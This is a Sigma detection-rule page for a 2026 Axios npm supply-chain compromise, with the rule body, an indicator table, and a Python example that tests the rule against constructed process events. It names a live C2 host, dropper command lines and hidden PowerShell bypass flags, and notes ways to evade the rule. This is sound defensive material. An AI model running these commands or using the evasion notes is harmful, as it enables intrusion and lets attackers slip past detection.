Axios NPM Compromise Indicators - Windows
Detects the specific Windows execution chain and process tree associated with the Axios NPM supply chain compromise. On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency (plain-crypto-js@4.2.1) that executed a postinstall script as a cross-platform RAT dropper. The dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection. The attack used cscript.exe (VBScript), curl.exe (C2), and PowerShell masquerading as Windows Terminal.
MITRE ATT&CK coverage
| Tactic | Techniques |
|---|---|
| Initial Access | T1195.002 Supply Chain Compromise: Compromise Software Supply Chain |
| Execution | T1059.003 Command and Scripting Interpreter: Windows Command Shell, T1059.005 Command and Scripting Interpreter: Visual Basic |
| Command & Control | T1105 Ingress Tool Transfer |
Event coverage
| Provider | Event | Title |
|---|---|---|
| Sysmon | Event ID 1 | Process creation |
Rule body

```yaml
title: Axios NPM Compromise Indicators - Windows
id: f6c27ecc-d890-4452-80e6-2e274a10e097
status: experimental
description: |
    Detects the specific Windows execution chain and process tree associated with the Axios NPM supply chain compromise.
    On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency (plain-crypto-js@4.2.1) that executed a postinstall script as a cross-platform RAT dropper.
    The dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection.
    The attack used cscript.exe (VBScript), curl.exe (C2), and PowerShell masquerading as Windows Terminal.
references:
    - https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
    - https://thehackernews.com/2026/03/axios-supply-chain-attack-pushes-cross.html?m=1
    - https://www.derp.ca/research/axios-npm-supply-chain-rat/
    - https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
    - https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-04-01
tags:
    - attack.initial-access
    - attack.t1195.002
    - attack.execution
    - attack.command-and-control
    - attack.t1059.003
    - attack.t1059.005
    - attack.t1105
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_cscript:
        ParentImage|endswith:
            - '\node.exe'
            - '\bun.exe'
        Image|endswith: '\cmd.exe'
        CommandLine|contains|all:
            - 'cscript'
            - 'AppData\Local\Temp'
            - '//nologo && del'
            - '6202033.vbs'
    selection_curl:
        Image|endswith:
            - '\curl.exe'
            - '\powershell.exe'
        CommandLine|contains: 'http://sfrclak.com'
    selection_susp_cli:
        OriginalFileName: 'PowerShell.EXE'
        CommandLine|contains: '"C:\ProgramData\wt.exe" -w hidden -ep bypass -file'
    condition: 1 of selection_*
falsepositives:
    - Highly unlikely
level: high
```
Stages and Predicates

Stage 0: condition

```yaml
condition: 1 of selection_*
```

Stage 1: selection_cscript

```yaml
selection_cscript:
    ParentImage|endswith:
        - '\node.exe'
        - '\bun.exe'
    Image|endswith: '\cmd.exe'
    CommandLine|contains|all:
        - 'cscript'
        - 'AppData\Local\Temp'
        - '//nologo && del'
        - '6202033.vbs'
```

Stage 2: selection_curl

```yaml
selection_curl:
    Image|endswith:
        - '\curl.exe'
        - '\powershell.exe'
    CommandLine|contains: 'http://sfrclak.com'
```

Stage 3: selection_susp_cli

```yaml
selection_susp_cli:
    OriginalFileName: 'PowerShell.EXE'
    CommandLine|contains: '"C:\ProgramData\wt.exe" -w hidden -ep bypass -file'
```
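The following Python is an added worked example, not code from the page or from the rule's author: it transcribes the three selections and the `1 of selection_*` condition above into predicate functions and evaluates them over a handful of constructed Sysmon Event ID 1 records. The event records, user and script paths, and the `OriginalFileName` of the legitimate Windows Terminal launcher are assumptions made for the example; the indicator strings are taken verbatim from the rule.

```python
"""Evaluate the Sigma selections of 'Axios NPM Compromise Indicators - Windows'
against constructed Sysmon Event ID 1 (process creation) records.

Added example: the events below are constructed for illustration, not captured
telemetry. Indicator strings are copied from the rule body.
"""

# --- Indicator strings transcribed from the rule ---------------------------
CSCRIPT_PARENTS = ("\\node.exe", "\\bun.exe")
CSCRIPT_CMDLINE_ALL = ("cscript", "AppData\\Local\\Temp", "//nologo && del", "6202033.vbs")
CURL_IMAGES = ("\\curl.exe", "\\powershell.exe")
C2_MARKER = "http://sfrclak.com"
MASQ_CMDLINE = '"C:\\ProgramData\\wt.exe" -w hidden -ep bypass -file'


def _ends_with(value, suffixes):
    # Sigma string modifiers are case-insensitive by default, so normalise both sides.
    v = (value or "").lower()
    return any(v.endswith(s.lower()) for s in suffixes)


def _contains_all(value, needles):
    # '|contains|all': every needle must appear somewhere in the field.
    v = (value or "").lower()
    return all(n.lower() in v for n in needles)


def selection_cscript(ev):
    # node/bun -> cmd.exe running cscript on a .vbs in %TEMP% and deleting it afterwards.
    return (_ends_with(ev.get("ParentImage"), CSCRIPT_PARENTS)
            and _ends_with(ev.get("Image"), ("\\cmd.exe",))
            and _contains_all(ev.get("CommandLine"), CSCRIPT_CMDLINE_ALL))


def selection_curl(ev):
    # curl.exe or powershell.exe with the C2 host literally present in the command line.
    return (_ends_with(ev.get("Image"), CURL_IMAGES)
            and _contains_all(ev.get("CommandLine"), (C2_MARKER,)))


def selection_susp_cli(ev):
    # PE metadata says PowerShell even though the on-disk name is wt.exe (masquerading).
    return ((ev.get("OriginalFileName") or "").lower() == "powershell.exe"
            and _contains_all(ev.get("CommandLine"), (MASQ_CMDLINE,)))


SELECTIONS = {
    "selection_cscript": selection_cscript,
    "selection_curl": selection_curl,
    "selection_susp_cli": selection_susp_cli,
}


def evaluate(ev):
    """Names of the selections an event satisfies; the rule fires on any one of them."""
    return [name for name, fn in SELECTIONS.items() if fn(ev)]


# Constructed sample events (assumed paths and user name; not real telemetry).
SAMPLE_EVENTS = [
    {   # benign: an npm install script that rebuilds a native module via cmd.exe
        "id": "benign-build",
        "ParentImage": r"C:\Program Files\nodejs\node.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"C:\Windows\system32\cmd.exe /d /s /c node-gyp rebuild",
        "OriginalFileName": "Cmd.Exe",
    },
    {   # dropper stage from the rule: VBScript run from %TEMP%, then deleted
        "id": "dropper-vbs",
        "ParentImage": r"C:\Program Files\nodejs\node.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": (r"C:\Windows\system32\cmd.exe /d /s /c cscript "
                        r"C:\Users\dev\AppData\Local\Temp\6202033.vbs //nologo && del "
                        r"C:\Users\dev\AppData\Local\Temp\6202033.vbs"),
        "OriginalFileName": "Cmd.Exe",
    },
    {   # C2 contact via curl.exe
        "id": "c2-curl",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\curl.exe",
        "CommandLine": "curl.exe -s http://sfrclak.com",
        "OriginalFileName": "curl.exe",
    },
    {   # same C2 host, upper-cased, from PowerShell: matching is case-insensitive
        "id": "c2-powershell-upper",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE",
        "CommandLine": 'POWERSHELL -NOP -C "IWR HTTP://SFRCLAK.COM"',
        "OriginalFileName": "PowerShell.EXE",
    },
    {   # PowerShell copied to C:\ProgramData\wt.exe; script name is a placeholder
        "id": "wt-masquerade",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\ProgramData\wt.exe",
        "CommandLine": r'"C:\ProgramData\wt.exe" -w hidden -ep bypass -file C:\ProgramData\payload.ps1',
        "OriginalFileName": "PowerShell.EXE",
    },
    {   # genuine Windows Terminal launcher (OriginalFileName assumed for the example)
        "id": "wt-legit",
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Users\dev\AppData\Local\Microsoft\WindowsApps\wt.exe",
        "CommandLine": r'"C:\Users\dev\AppData\Local\Microsoft\WindowsApps\wt.exe" -w hidden',
        "OriginalFileName": "wt.exe",
    },
]


def run_all(events=SAMPLE_EVENTS):
    """Map each sample event id to the selections it triggers."""
    return {ev["id"]: evaluate(ev) for ev in events}


if __name__ == "__main__":
    for event_id, hits in run_all().items():
        print(f"{event_id:22s} -> {hits or 'no match'}")
```

Two points the example makes explicit. Matching is case-insensitive, so the upper-cased `HTTP://SFRCLAK.COM` still satisfies `selection_curl`. And `selection_susp_cli` keys on `OriginalFileName` from the PE version resource rather than the on-disk name, which is what separates a renamed PowerShell from a real `wt.exe`. The flip side is that `selection_curl` only fires when the C2 host appears literally in the command line; a PowerShell invocation that pulls the URL from a script file or passes it through `-EncodedCommand` would not be caught by this rule alone.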
Indicators

Each row lists a field, the operator applied to it, and the values the rule matches on that field; the values are collected from the rule body above. Where a corpus count is shown, it counts how many other rules in the catalog look for the same combination: high numbers point to widely-used, community-vetted indicators, while blank or 1 means the indicator is specific to this rule.

| Field | Kind | Values |
|---|---|---|
| CommandLine | match | `cscript`, `AppData\Local\Temp`, `//nologo && del`, `6202033.vbs` (all four together); `http://sfrclak.com`; `"C:\ProgramData\wt.exe" -w hidden -ep bypass -file` |
| Image | ends_with | `\cmd.exe`, `\curl.exe`, `\powershell.exe` |
| OriginalFileName | eq | `PowerShell.EXE` |
| ParentImage | ends_with | `\node.exe`, `\bun.exe` |